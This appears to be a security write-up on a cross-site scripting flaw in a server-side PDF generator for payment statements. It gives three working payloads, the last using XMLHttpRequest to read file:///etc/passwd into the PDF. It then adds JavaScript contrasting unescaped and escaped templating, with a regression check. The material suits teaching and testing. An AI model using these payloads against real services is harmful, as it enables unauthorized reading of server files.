Local File read via XSS in dynamically generated PDF

Introduction

This post shows how an XSS in a dynamically generated PDF can be used to read files on the server and have their contents rendered into the PDF.

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=xyz&date...

The utrnumber parameter is the XSS injection point: its value is placed unescaped into the HTML that the server renders to PDF.

Payload 1:

The downloaded PDF showed aaaa, i.e. the extra text appended by the script, proving that the PDF renderer executes JavaScript.

<p id="test">aaa</p><script>document.getElementById('test').innerHTML+='aa'</script>

Payload 2:

The downloaded PDF showed the location of the page being rendered, a file:// URL such as file://... (%2b is the URL-encoded +; a literal + in the query string would be decoded as a space).

<img src=x onerror="document.write('aaa'%2bwindow.location)">

Payload 3:

Since the renderer loads the page over file://, the same XSS can use XMLHttpRequest to fetch /etc/passwd and write its contents into the PDF.

<script>
	x=new XMLHttpRequest;
	x.onload=function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>
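The root cause is that the raw utrnumber value is concatenated into the HTML that the PDF renderer loads. The following JavaScript is an added example, not code from the post or from the affected site: it shows the vulnerable embedding next to an escaped version and a regression check that the post's payloads no longer survive as markup. The statement template, the function names and the constructed request URL are assumptions.

```javascript
// Added example, not code from the original post. The statement template,
// function names and the constructed request below are assumptions.

// Escape every character that can open a tag or break out of an attribute.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Query parameters are URL-decoded before the template sees them. Note that a
// literal "+" decodes to a space, which is why the post encodes it as %2b.
function parseParams(url) {
  return Object.fromEntries(new URL(url).searchParams);
}

// Vulnerable pattern: the raw parameter is concatenated into the HTML that the
// headless browser renders to PDF, so a <script> tag or an inline event
// handler in utrnumber executes inside the renderer.
function renderStatementUnsafe(params) {
  return `<html><body><h1>Statement</h1><p>UTR: ${params.utrnumber}</p></body></html>`;
}

// Hardened pattern: escape at the point of embedding, so the value can only
// ever be text. Disabling JavaScript and file:// access in the renderer is a
// separate, second layer and does not replace this.
function renderStatementSafe(params) {
  return `<html><body><h1>Statement</h1><p>UTR: ${escapeHtml(params.utrnumber)}</p></body></html>`;
}

// Regression check: does the rendered HTML contain a script tag or a tag with
// an inline on*= handler? Escaped text such as "&lt;img ... onerror=" does not
// match because it no longer starts with "<".
function containsActiveContent(html) {
  return /<script\b|<\w+[^>]*\bon\w+\s*=/i.test(html);
}

// Constructed request carrying the post's third payload in utrnumber.
const PAYLOAD_3 = '<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};'
  + 'x.open("GET","file:///etc/passwd");x.send();</script>';
const SAMPLE_URL = 'https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber='
  + encodeURIComponent(PAYLOAD_3) + '&date=2024-01-01';

const sampleParams = parseParams(SAMPLE_URL);
console.log('unsafe active content:', containsActiveContent(renderStatementUnsafe(sampleParams))); // true
console.log('safe active content:  ', containsActiveContent(renderStatementSafe(sampleParams)));   // false
```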

Ref

Local File read via XSS in dynamically generated PDF
